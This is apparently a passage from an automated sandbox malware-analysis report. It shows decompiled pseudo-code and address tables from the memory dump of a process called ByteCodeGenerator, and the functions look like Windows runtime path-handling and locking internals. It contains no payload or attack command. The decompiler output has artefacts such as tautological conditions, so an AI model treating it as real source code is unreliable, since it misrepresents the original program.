                                  														if(_t306 != 0) {
                                  															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                  														}
                                  													}
                                  													_t181 = _v544;
                                  													if(_t181 != 0) {
                                  														 *_t181 = 0;
                                  														 *((intOrPtr*)(_t181 + 4)) = 0;
                                  														 *((intOrPtr*)(_t181 + 8)) = 0;
                                  														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                  														if(_v540 == 5) {
                                  															_t182 = E034252A5(1);
                                  															_v588 = _t182;
                                  															if(_t182 == 0) {
                                  																E0343EB70(1, 0x35179a0);
                                  																goto L38;
                                  															} else {
                                  																_v560 = _t182 + 0xc;
                                  																_t185 = E0343AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                  																if(_t185 == 0) {
                                  																	_t324 = _v588;
                                  																	goto L97;
                                  																} else {
                                  																	_t306 = _v544;
                                  																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                  																	 *(_t306 + 4) = _t282;
                                  																	_v576 = _t282;
                                  																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                  																	 *_t306 = _t325;
                                  																	if( *_t282 == 0x5c) {
                                  																		_t149 = _t325 - 2; // -2
                                  																		_t283 = _t149;
                                  																		 *_t306 = _t283;
                                  																		 *(_t306 + 4) = _v576 + 2;
                                  																		_t185 = _t283 & 0x0000ffff;
                                  																	}
                                  																	_t324 = _v588;
                                  																	 *(_t306 + 2) = _t185;
                                  																	if((_v548 & 0x00000002) == 0) {
                                  																		L97:
                                  																		asm("lock xadd [esi], eax");
                                  																		if((_t185 | 0xffffffff) == 0) {
                                  																			_push( *((intOrPtr*)(_t324 + 4)));
                                  																			E034695D0();
                                  																			L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                  																		}
                                  																	} else {
                                  																		 *(_t306 + 0xc) = _t324;
                                  																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                  																	}
                                  																	goto L38;
                                  																}
                                  															}
                                  															goto L41;
                                  														}
                                  													}
                                  													L38:
                                  													_t322 = 0;
                                  												}
                                  											}
                                  										}
                                  									}
                                  									L39:
                                  									if(_t254 !=  &_v532) {
                                  										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                  									}
                                  									_t169 = _t322;
                                  								}
                                  								goto L41;
                                  							}
                                  							goto L68;
                                  						}
                                  					}
                                  					L41:
                                  					_pop(_t317);
                                  					_pop(_t323);
                                  					_pop(_t255);
                                  					return E0346B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                  				} else {
                                  					_t299 = __edx[2];
                                  					if( *_t299 == 0x5c) {
                                  						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                  						if(_t256 != 0x5c) {
                                  							if(_t256 != 0x3f) {
                                  								goto L2;
                                  							} else {
                                  								goto L50;
                                  							}
                                  						} else {
                                  							L50:
                                  							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                  								goto L2;
                                  							} else {
                                  								_t251 = E03463D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                  								_pop(_t319);
                                  								_pop(_t326);
                                  								_pop(_t257);
                                  								return E0346B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                  							}
                                  						}
                                  					} else {
                                  						L2:
                                  						_t260 = _v572;
                                  						goto L3;
                                  					}
                                  				}
                                  				L101:
                                  			}















































































                                  0x03444128
                                  0x03444135
                                  0x0344413c
                                  0x03444141
                                  0x03444145
                                  0x03444147
                                  0x0344414e
                                  0x03444151
                                  0x03444159
                                  0x0344415c
                                  0x03444160
                                  0x03444164
                                  0x03444168
                                  0x0344416c
                                  0x0344417f
                                  0x03444181
                                  0x0344446a
                                  0x0344446a
                                  0x0344418c
                                  0x03444195
                                  0x03444199
                                  0x03444432
                                  0x03444439
                                  0x0344443d
                                  0x03444442
                                  0x03444447
                                  0x00000000
                                  0x0344419f
                                  0x034441a3
                                  0x034441b1
                                  0x034441b9
                                  0x034441bd
                                  0x034445db
                                  0x034445db
                                  0x00000000
                                  0x034441c3
                                  0x034441c3
                                  0x034441ce
                                  0x034441d4
                                  0x0348e138
                                  0x0348e13e
                                  0x0348e169
                                  0x0348e16d
                                  0x0348e19e
                                  0x0348e16f
                                  0x0348e16f
                                  0x0348e175
                                  0x0348e179
                                  0x0348e18f
                                  0x0348e193
                                  0x00000000
                                  0x0348e199
                                  0x00000000
                                  0x0348e199
                                  0x0348e193
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034441da
                                  0x034441da
                                  0x034441df
                                  0x034441e4
                                  0x034441ec
                                  0x03444203
                                  0x03444207
                                  0x0348e1fd
                                  0x03444222
                                  0x03444226
                                  0x0348e1f3
                                  0x0348e1f3
                                  0x0344422c
                                  0x0344422c
                                  0x03444233
                                  0x0348e1ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03444239
                                  0x03444239
                                  0x03444239
                                  0x03444239
                                  0x03444233
                                  0x03444226
                                  0x034441ee
                                  0x034441ee
                                  0x034441f4
                                  0x03444575
                                  0x0348e1b1
                                  0x0348e1b1
                                  0x00000000
                                  0x0344457b
                                  0x0344457b
                                  0x03444582
                                  0x0348e1ab
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03444588
                                  0x03444588
                                  0x0344458c
                                  0x0348e1c4
                                  0x0348e1c4
                                  0x00000000
                                  0x03444592
                                  0x03444592
                                  0x03444599
                                  0x0348e1be
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0344459f
                                  0x0344459f
                                  0x034445a3
                                  0x0348e1d7
                                  0x0348e1e4
                                  0x00000000
                                  0x034445a9
                                  0x034445a9
                                  0x034445b0
                                  0x0348e1d1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034445b6
                                  0x034445b6
                                  0x034445b6
                                  0x00000000
                                  0x034445b6
                                  0x034445b0
                                  0x034445a3
                                  0x03444599
                                  0x0344458c
                                  0x03444582
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034441f4
                                  0x0344423e
                                  0x03444241
                                  0x034445c0
                                  0x034445c4
                                  0x00000000
                                  0x034445ca
                                  0x034445ca
                                  0x00000000
                                  0x0348e207
                                  0x0348e20f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034445d1
                                  0x00000000
                                  0x00000000
                                  0x034445ca
                                  0x00000000
                                  0x03444247
                                  0x03444247
                                  0x03444247
                                  0x03444249
                                  0x03444249
                                  0x03444249
                                  0x03444251
                                  0x03444251
                                  0x03444257
                                  0x0344425f
                                  0x0344426e
                                  0x03444270
                                  0x0344427a
                                  0x0348e219
                                  0x0348e219
                                  0x03444280
                                  0x03444282
                                  0x03444456
                                  0x034445ea
                                  0x00000000
                                  0x034445f0
                                  0x0348e223
                                  0x00000000
                                  0x0348e223
                                  0x0344445c
                                  0x0344445c
                                  0x00000000
                                  0x0344445c
                                  0x00000000
                                  0x03444288
                                  0x0344428c
                                  0x0348e298
                                  0x03444292
                                  0x03444292
                                  0x0344429e
                                  0x034442a3
                                  0x034442a7
                                  0x034442ac
                                  0x0348e22d
                                  0x034442b2
                                  0x034442b2
                                  0x034442b9
                                  0x034442bc
                                  0x034442c2
                                  0x034442ca
                                  0x034442cd
                                  0x034442cd
                                  0x034442d4
                                  0x0344433f
                                  0x0344433f
                                  0x034442d6
                                  0x034442d6
                                  0x034442d9
                                  0x034442dd
                                  0x034442eb
                                  0x0348e23a
                                  0x034442f1
                                  0x03444305
                                  0x0344430d
                                  0x03444315
                                  0x03444318
                                  0x0344431f
                                  0x03444322
                                  0x0344432e
                                  0x0344433b
                                  0x0344433b
                                  0x00000000
                                  0x0344432e
                                  0x034442eb
                                  0x0344434c
                                  0x0344434e
                                  0x03444352
                                  0x03444359
                                  0x0344435e
                                  0x03444361
                                  0x0344436e
                                  0x0344438a
                                  0x0344438e
                                  0x03444396
                                  0x0344439e
                                  0x034443a1
                                  0x034443ad
                                  0x034443bb
                                  0x034443bb
                                  0x034443ad
                                  0x0344436e
                                  0x034443bf
                                  0x034443c5
                                  0x03444463
                                  0x03444463
                                  0x034443ce
                                  0x034443d5
                                  0x034443d9
                                  0x034443df
                                  0x03444475
                                  0x03444479
                                  0x03444491
                                  0x03444491
                                  0x03444479
                                  0x034443e5
                                  0x034443eb
                                  0x034443f4
                                  0x034443f6
                                  0x034443f9
                                  0x034443fc
                                  0x034443ff
                                  0x034444e8
                                  0x034444ed
                                  0x034444f3
                                  0x0348e247
                                  0x00000000
                                  0x034444f9
                                  0x03444504
                                  0x03444508
                                  0x0344450f
                                  0x0348e269
                                  0x00000000
                                  0x03444515
                                  0x03444519
                                  0x03444531
                                  0x03444534
                                  0x03444537
                                  0x0344453e
                                  0x03444541
                                  0x0344454a
                                  0x0348e255
                                  0x0348e255
                                  0x0348e25b
                                  0x0348e25e
                                  0x0348e261
                                  0x0348e261
                                  0x03444555
                                  0x03444559
                                  0x0344455d
                                  0x0348e26d
                                  0x0348e270
                                  0x0348e274
                                  0x0348e27a
                                  0x0348e27d
                                  0x0348e28e
                                  0x0348e28e
                                  0x03444563
                                  0x03444563
                                  0x03444569
                                  0x03444569
                                  0x00000000
                                  0x0344455d
                                  0x0344450f
                                  0x00000000
                                  0x034444f3
                                  0x034443ff
                                  0x03444405
                                  0x03444405
                                  0x03444405
                                  0x034442ac
                                  0x0344428c
                                  0x03444282
                                  0x03444407
                                  0x0344440d
                                  0x0348e2af
                                  0x0348e2af
                                  0x03444413
                                  0x03444413
                                  0x00000000
                                  0x034441d4
                                  0x00000000
                                  0x034441c3
                                  0x034441bd
                                  0x03444415
                                  0x03444415
                                  0x03444416
                                  0x03444417
                                  0x03444429
                                  0x0344416e
                                  0x0344416e
                                  0x03444175
                                  0x03444498
                                  0x0344449f
                                  0x0348e12d
                                  0x00000000
                                  0x0348e133
                                  0x00000000
                                  0x0348e133
                                  0x034444a5
                                  0x034444a5
                                  0x034444aa
                                  0x00000000
                                  0x034444bb
                                  0x034444ca
                                  0x034444d6
                                  0x034444d7
                                  0x034444d8
                                  0x034444e3
                                  0x034444e3
                                  0x034444aa
                                  0x0344417b
                                  0x0344417b
                                  0x0344417b
                                  0x00000000
                                  0x0344417b
                                  0x03444175
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13fc435168bd9a6e478488ee5b1e51b9b98e10a283c6bead0f1880f1345f6540
                                  • Instruction ID: 464bf6836a296bb5de436345a354fc524eeadf14d11e548e9d19838982a14c29
                                  • Opcode Fuzzy Hash: 13fc435168bd9a6e478488ee5b1e51b9b98e10a283c6bead0f1880f1345f6540
                                  • Instruction Fuzzy Hash: 65F16B746082118BD724DF5AC480A3BB7E1BF88744F58496FF8968F350E734D886CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E034520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed char _v24;
                                  				intOrPtr _v28;
                                  				signed int _v32;
                                  				void* _v36;
                                  				char _v48;
                                  				signed int _v52;
                                  				signed int _v56;
                                  				unsigned int _v60;
                                  				char _v64;
                                  				unsigned int _v68;
                                  				signed int _v72;
                                  				char _v73;
                                  				signed int _v74;
                                  				char _v75;
                                  				signed int _v76;
                                  				void* _v81;
                                  				void* _v82;
                                  				void* _v89;
                                  				void* _v92;
                                  				void* _v97;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed char _t128;
                                  				void* _t129;
                                  				signed int _t130;
                                  				void* _t132;
                                  				signed char _t133;
                                  				intOrPtr _t135;
                                  				signed int _t137;
                                  				signed int _t140;
                                  				signed int* _t144;
                                  				signed int* _t145;
                                  				intOrPtr _t146;
                                  				signed int _t147;
                                  				signed char* _t148;
                                  				signed int _t149;
                                  				signed int _t153;
                                  				signed int _t169;
                                  				signed int _t174;
                                  				signed int _t180;
                                  				void* _t197;
                                  				void* _t198;
                                  				signed int _t201;
                                  				intOrPtr* _t202;
                                  				intOrPtr* _t205;
                                  				signed int _t210;
                                  				signed int _t215;
                                  				signed int _t218;
                                  				signed char _t221;
                                  				signed int _t226;
                                  				char _t227;
                                  				signed int _t228;
                                  				void* _t229;
                                  				unsigned int _t231;
                                  				void* _t235;
                                  				signed int _t240;
                                  				signed int _t241;
                                  				void* _t242;
                                  				signed int _t246;
                                  				signed int _t248;
                                  				signed int _t252;
                                  				signed int _t253;
                                  				void* _t254;
                                  				intOrPtr* _t256;
                                  				intOrPtr _t257;
                                  				unsigned int _t262;
                                  				signed int _t265;
                                  				void* _t267;
                                  				signed int _t275;
                                  
                                  				_t198 = __ebx;
                                  				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                  				_v68 = __ecx;
                                  				_v73 = 0;
                                  				_t201 = __edx & 0x00002000;
                                  				_t128 = __edx & 0xffffdfff;
                                  				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                  				_v72 = _t128;
                                  				if((_t128 & 0x00000008) != 0) {
                                  					__eflags = _t128 - 8;
                                  					if(_t128 != 8) {
                                  						L69:
                                  						_t129 = 0xc000000d;
                                  						goto L23;
                                  					} else {
                                  						_t130 = 0;
                                  						_v72 = 0;
                                  						_v75 = 1;
                                  						L2:
                                  						_v74 = 1;
                                  						_t226 =  *0x3518714; // 0x0
                                  						if(_t226 != 0) {
                                  							__eflags = _t201;
                                  							if(_t201 != 0) {
                                  								L62:
                                  								_v74 = 1;
                                  								L63:
                                  								_t130 = _t226 & 0xffffdfff;
                                  								_v72 = _t130;
                                  								goto L3;
                                  							}
                                  							_v74 = _t201;
                                  							__eflags = _t226 & 0x00002000;
                                  							if((_t226 & 0x00002000) == 0) {
                                  								goto L63;
                                  							}
                                  							goto L62;
                                  						}
                                  						L3:
                                  						_t227 = _v75;
                                  						L4:
                                  						_t240 = 0;
                                  						_v56 = 0;
                                  						_t252 = _t130 & 0x00000100;
                                  						if(_t252 != 0 || _t227 != 0) {
                                  							_t240 = _v68;
                                  							_t132 = E03452EB0(_t240);
                                  							__eflags = _t132 - 2;
                                  							if(_t132 != 2) {
                                  								__eflags = _t132 - 1;
                                  								if(_t132 == 1) {
                                  									goto L25;
                                  								}
                                  								__eflags = _t132 - 6;
                                  								if(_t132 == 6) {
                                  									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                  									if( *((short*)(_t240 + 4)) != 0x3f) {
                                  										goto L40;
                                  									}
                                  									_t197 = E03452EB0(_t240 + 8);
                                  									__eflags = _t197 - 2;
                                  									if(_t197 == 2) {
                                  										goto L25;
                                  									}
                                  								}
                                  								L40:
                                  								_t133 = 1;
                                  								L26:
                                  								_t228 = _v75;
                                  								_v56 = _t240;
                                  								__eflags = _t133;
                                  								if(_t133 != 0) {
                                  									__eflags = _t228;
                                  									if(_t228 == 0) {
                                  										L43:
                                  										__eflags = _v72;
                                  										if(_v72 == 0) {
                                  											goto L8;
                                  										}
                                  										goto L69;
                                  									}
                                  									_t133 = E034258EC(_t240);
                                  									_t221 =  *0x3515cac; // 0x16
                                  									__eflags = _t221 & 0x00000040;
                                  									if((_t221 & 0x00000040) != 0) {
                                  										_t228 = 0;
                                  										__eflags = _t252;
                                  										if(_t252 != 0) {
                                  											goto L43;
                                  										}
                                  										_t133 = _v72;
                                  										goto L7;
                                  									}
                                  									goto L43;
                                  								} else {
                                  									_t133 = _v72;
                                  									goto L6;
                                  								}
                                  							}
                                  							L25:
                                  							_t133 = _v73;
                                  							goto L26;
                                  						} else {
                                  							L6:
                                  							_t221 =  *0x3515cac; // 0x16
                                  							L7:
                                  							if(_t133 != 0) {
                                  								__eflags = _t133 & 0x00001000;
                                  								if((_t133 & 0x00001000) != 0) {
                                  									_t133 = _t133 | 0x00000a00;
                                  									__eflags = _t221 & 0x00000004;
                                  									if((_t221 & 0x00000004) != 0) {
                                  										_t133 = _t133 | 0x00000400;
                                  									}
                                  								}
                                  								__eflags = _t228;
                                  								if(_t228 != 0) {
                                  									_t133 = _t133 | 0x00000100;
                                  								}
                                  								_t229 = E03464A2C(0x3516e40, 0x3464b30, _t133, _t240);
                                  								__eflags = _t229;
                                  								if(_t229 == 0) {
                                  									_t202 = _a20;
                                  									goto L100;
                                  								} else {
                                  									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                  									L15:
                                  									_t202 = _a20;
                                  									 *_t202 = _t135;
                                  									if(_t229 == 0) {
                                  										L100:
                                  										 *_a4 = 0;
                                  										_t137 = _a8;
                                  										__eflags = _t137;
                                  										if(_t137 != 0) {
                                  											 *_t137 = 0;
                                  										}
                                  										 *_t202 = 0;
                                  										_t129 = 0xc0000017;
                                  										goto L23;
                                  									} else {
                                  										_t242 = _a16;
                                  										if(_t242 != 0) {
                                  											_t254 = _t229;
                                  											memcpy(_t242, _t254, 0xd << 2);
                                  											_t267 = _t267 + 0xc;
                                  											_t242 = _t254 + 0x1a;
                                  										}
                                  										_t205 = _a4;
                                  										_t25 = _t229 + 0x48; // 0x48
                                  										 *_t205 = _t25;
                                  										_t140 = _a8;
                                  										if(_t140 != 0) {
                                  											__eflags =  *((char*)(_t267 + 0xa));
                                  											if( *((char*)(_t267 + 0xa)) != 0) {
                                  												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                  											} else {
                                  												 *_t140 = 0;
                                  											}
                                  										}
                                  										_t256 = _a12;
                                  										if(_t256 != 0) {
                                  											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                  										}
                                  										_t257 =  *_t205;
                                  										_v48 = 0;
                                  										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                  										_v56 = 0;
                                  										_v52 = 0;
                                  										_t144 =  *( *[fs:0x30] + 0x50);
                                  										if(_t144 != 0) {
                                  											__eflags =  *_t144;
                                  											if( *_t144 == 0) {
                                  												goto L20;
                                  											}
                                  											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                  											goto L21;
                                  										} else {
                                  											L20:
                                  											_t145 = 0x7ffe0384;
                                  											L21:
                                  											if( *_t145 != 0) {
                                  												_t146 =  *[fs:0x30];
                                  												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                  												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                  													_t147 = E03447D50();
                                  													__eflags = _t147;
                                  													if(_t147 == 0) {
                                  														_t148 = 0x7ffe0385;
                                  													} else {
                                  														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                  													}
                                  													__eflags =  *_t148 & 0x00000020;
                                  													if(( *_t148 & 0x00000020) != 0) {
                                  														_t149 = _v72;
                                  														__eflags = _t149;
                                  														if(__eflags == 0) {
                                  															_t149 = 0x3405c80;
                                  														}
                                  														_push(_t149);
                                  														_push( &_v48);
                                  														 *((char*)(_t267 + 0xb)) = E0345F6E0(_t198, _t242, _t257, __eflags);
                                  														_push(_t257);
                                  														_push( &_v64);
                                  														_t153 = E0345F6E0(_t198, _t242, _t257, __eflags);
                                  														__eflags =  *((char*)(_t267 + 0xb));
                                  														if( *((char*)(_t267 + 0xb)) != 0) {
                                  															__eflags = _t153;
                                  															if(_t153 != 0) {
                                  																__eflags = 0;
                                  																E034A7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                  																L03442400(_t267 + 0x20);
                                  															}
                                  															L03442400( &_v64);
                                  														}
                                  													}
                                  												}
                                  											}
                                  											_t129 = 0;
                                  											L23:
                                  											return _t129;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							L8:
                                  							_t275 = _t240;
                                  							if(_t275 != 0) {
                                  								_v73 = 0;
                                  								_t253 = 0;
                                  								__eflags = 0;
                                  								L29:
                                  								_push(0);
                                  								_t241 = E03452397(_t240);
                                  								__eflags = _t241;
                                  								if(_t241 == 0) {
                                  									_t229 = 0;
                                  									L14:
                                  									_t135 = 0;
                                  									goto L15;
                                  								}
                                  								__eflags =  *((char*)(_t267 + 0xb));
                                  								 *(_t241 + 0x34) = 1;
                                  								if( *((char*)(_t267 + 0xb)) != 0) {
                                  									E03442280(_t134, 0x3518608);
                                  									__eflags =  *0x3516e48 - _t253; // 0x0
                                  									if(__eflags != 0) {
                                  										L48:
                                  										_t253 = 0;
                                  										__eflags = 0;
                                  										L49:
                                  										E0343FFB0(_t198, _t241, 0x3518608);
                                  										__eflags = _t253;
                                  										if(_t253 != 0) {
                                  											L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                  										}
                                  										goto L31;
                                  									}
                                  									 *0x3516e48 = _t241;
                                  									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                  									__eflags = _t253;
                                  									if(_t253 != 0) {
                                  										_t57 = _t253 + 0x34;
                                  										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                  										__eflags =  *_t57;
                                  										if( *_t57 == 0) {
                                  											goto L49;
                                  										}
                                  									}
                                  									goto L48;
                                  								}
                                  								L31:
                                  								_t229 = _t241;
                                  								goto L14;
                                  							}
                                  							_v73 = 1;
                                  							_v64 = _t240;
                                  							asm("lock bts dword [esi], 0x0");
                                  							if(_t275 < 0) {
                                  								_t231 =  *0x3518608; // 0x0
                                  								while(1) {
                                  									_v60 = _t231;
                                  									__eflags = _t231 & 0x00000001;
                                  									if((_t231 & 0x00000001) != 0) {
                                  										goto L76;
                                  									}
                                  									_t73 = _t231 + 1; // 0x1
                                  									_t210 = _t73;
                                  									asm("lock cmpxchg [edi], ecx");
                                  									__eflags = _t231 - _t231;
                                  									if(_t231 != _t231) {
                                  										L92:
                                  										_t133 = E03456B90(_t210,  &_v64);
                                  										_t262 =  *0x3518608; // 0x0
                                  										L93:
                                  										_t231 = _t262;
                                  										continue;
                                  									}
                                  									_t240 = _v56;
                                  									goto L10;
                                  									L76:
                                  									_t169 = E0345E180(_t133);
                                  									__eflags = _t169;
                                  									if(_t169 != 0) {
                                  										_push(0xc000004b);
                                  										_push(0xffffffff);
                                  										E034697C0();
                                  										_t231 = _v68;
                                  									}
                                  									_v72 = 0;
                                  									_v24 =  *( *[fs:0x18] + 0x24);
                                  									_v16 = 3;
                                  									_v28 = 0;
                                  									__eflags = _t231 & 0x00000002;
                                  									if((_t231 & 0x00000002) == 0) {
                                  										_v32 =  &_v36;
                                  										_t174 = _t231 >> 4;
                                  										__eflags = 1 - _t174;
                                  										_v20 = _t174;
                                  										asm("sbb ecx, ecx");
                                  										_t210 = 3 |  &_v36;
                                  										__eflags = _t174;
                                  										if(_t174 == 0) {
                                  											_v20 = 0xfffffffe;
                                  										}
                                  									} else {
                                  										_v32 = 0;
                                  										_v20 = 0xffffffff;
                                  										_v36 = _t231 & 0xfffffff0;
                                  										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                  										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                  									}
                                  									asm("lock cmpxchg [edi], esi");
                                  									_t262 = _t231;
                                  									__eflags = _t262 - _t231;
                                  									if(_t262 != _t231) {
                                  										goto L92;
                                  									} else {
                                  										__eflags = _v72;
                                  										if(_v72 != 0) {
                                  											E0346006A(0x3518608, _t210);
                                  										}
                                  										__eflags =  *0x7ffe036a - 1;
                                  										if(__eflags <= 0) {
                                  											L89:
                                  											_t133 =  &_v16;
                                  											asm("lock btr dword [eax], 0x1");
                                  											if(__eflags >= 0) {
                                  												goto L93;
                                  											} else {
                                  												goto L90;
                                  											}
                                  											do {
                                  												L90:
                                  												_push(0);
                                  												_push(0x3518608);
                                  												E0346B180();
                                  												_t133 = _v24;
                                  												__eflags = _t133 & 0x00000004;
                                  											} while ((_t133 & 0x00000004) == 0);
                                  											goto L93;
                                  										} else {
                                  											_t218 =  *0x3516904; // 0x400
                                  											__eflags = _t218;
                                  											if(__eflags == 0) {
                                  												goto L89;
                                  											} else {
                                  												goto L87;
                                  											}
                                  											while(1) {
                                  												L87:
                                  												__eflags = _v16 & 0x00000002;
                                  												if(__eflags == 0) {
                                  													goto L89;
                                  												}
                                  												asm("pause");
                                  												_t218 = _t218 - 1;
                                  												__eflags = _t218;
                                  												if(__eflags != 0) {
                                  													continue;
                                  												}
                                  												goto L89;
                                  											}
                                  											goto L89;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							L10:
                                  							_t229 =  *0x3516e48; // 0x0
                                  							_v72 = _t229;
                                  							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                  								E0343FFB0(_t198, _t240, 0x3518608);
                                  								_t253 = _v76;
                                  								goto L29;
                                  							} else {
                                  								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                  								asm("lock cmpxchg [esi], ecx");
                                  								_t215 = 1;
                                  								if(1 != 1) {
                                  									while(1) {
                                  										_t246 = _t215 & 0x00000006;
                                  										_t180 = _t215;
                                  										__eflags = _t246 - 2;
                                  										_v56 = _t246;
                                  										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                  										asm("lock cmpxchg [edi], esi");
                                  										_t248 = _v56;
                                  										__eflags = _t180 - _t215;
                                  										if(_t180 == _t215) {
                                  											break;
                                  										}
                                  										_t215 = _t180;
                                  									}
                                  									__eflags = _t248 - 2;
                                  									if(_t248 == 2) {
                                  										__eflags = 0;
                                  										E034600C2(0x3518608, 0, _t235);
                                  									}
                                  									_t229 = _v72;
                                  								}
                                  								goto L14;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				_t227 = 0;
                                  				_v75 = 0;
                                  				if(_t128 != 0) {
                                  					goto L4;
                                  				}
                                  				goto L2;
                                  			}











































































                                  0x034520a0
                                  0x034520a8
                                  0x034520ad
                                  0x034520b3
                                  0x034520b8
                                  0x034520c2
                                  0x034520c7
                                  0x034520cb
                                  0x034520d2
                                  0x03452263
                                  0x03452266
                                  0x03495836
                                  0x03495836
                                  0x00000000
                                  0x0345226c
                                  0x0345226c
                                  0x03452270
                                  0x03452274
                                  0x034520e2
                                  0x034520e2
                                  0x034520e6
                                  0x034520ee
                                  0x034957dc
                                  0x034957de
                                  0x034957ec
                                  0x034957ec
                                  0x034957f1
                                  0x034957f3
                                  0x034957f8
                                  0x00000000
                                  0x034957f8
                                  0x034957e0
                                  0x034957e4
                                  0x034957ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034957ea
                                  0x034520f4
                                  0x034520f4
                                  0x034520f8
                                  0x034520f8
                                  0x034520fc
                                  0x03452100
                                  0x03452106
                                  0x03452201
                                  0x03452206
                                  0x0345220b
                                  0x0345220e
                                  0x034522a9
                                  0x034522ac
                                  0x00000000
                                  0x00000000
                                  0x034522b2
                                  0x034522b5
                                  0x03495801
                                  0x03495806
                                  0x00000000
                                  0x00000000
                                  0x03495810
                                  0x03495815
                                  0x03495818
                                  0x00000000
                                  0x00000000
                                  0x0349581e
                                  0x034522bb
                                  0x034522bb
                                  0x03452218
                                  0x03452218
                                  0x0345221c
                                  0x03452220
                                  0x03452222
                                  0x034522c2
                                  0x034522c4
                                  0x034522dc
                                  0x034522dc
                                  0x034522e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034522e7
                                  0x034522c8
                                  0x034522cd
                                  0x034522d3
                                  0x034522d6
                                  0x03495823
                                  0x03495825
                                  0x03495827
                                  0x00000000
                                  0x00000000
                                  0x0349582d
                                  0x00000000
                                  0x0349582d
                                  0x00000000
                                  0x03452228
                                  0x03452228
                                  0x00000000
                                  0x03452228
                                  0x03452222
                                  0x03452214
                                  0x03452214
                                  0x00000000
                                  0x03452114
                                  0x03452114
                                  0x03452114
                                  0x0345211a
                                  0x0345211c
                                  0x03452348
                                  0x0345234d
                                  0x03495840
                                  0x03495845
                                  0x03495848
                                  0x0349584e
                                  0x0349584e
                                  0x03495848
                                  0x03452353
                                  0x03452355
                                  0x03452388
                                  0x03452388
                                  0x03452368
                                  0x0345236a
                                  0x0345236c
                                  0x0345238f
                                  0x00000000
                                  0x0345236e
                                  0x0345236e
                                  0x0345218e
                                  0x0345218e
                                  0x03452191
                                  0x03452195
                                  0x03495a03
                                  0x03495a06
                                  0x03495a0c
                                  0x03495a0f
                                  0x03495a11
                                  0x03495a13
                                  0x03495a13
                                  0x03495a19
                                  0x03495a1f
                                  0x00000000
                                  0x0345219b
                                  0x0345219b
                                  0x034521a0
                                  0x03452282
                                  0x03452284
                                  0x03452284
                                  0x03452284
                                  0x03452284
                                  0x034521a6
                                  0x034521a9
                                  0x034521ac
                                  0x034521ae
                                  0x034521b3
                                  0x0345228b
                                  0x03452290
                                  0x03452379
                                  0x03452296
                                  0x03452298
                                  0x03452298
                                  0x03452290
                                  0x034521b9
                                  0x034521be
                                  0x034522a2
                                  0x034522a2
                                  0x034521c4
                                  0x034521c8
                                  0x034521cc
                                  0x034521d0
                                  0x034521d4
                                  0x034521de
                                  0x034521e3
                                  0x03495a29
                                  0x03495a2c
                                  0x00000000
                                  0x00000000
                                  0x03495a3b
                                  0x00000000
                                  0x034521e9
                                  0x034521e9
                                  0x034521e9
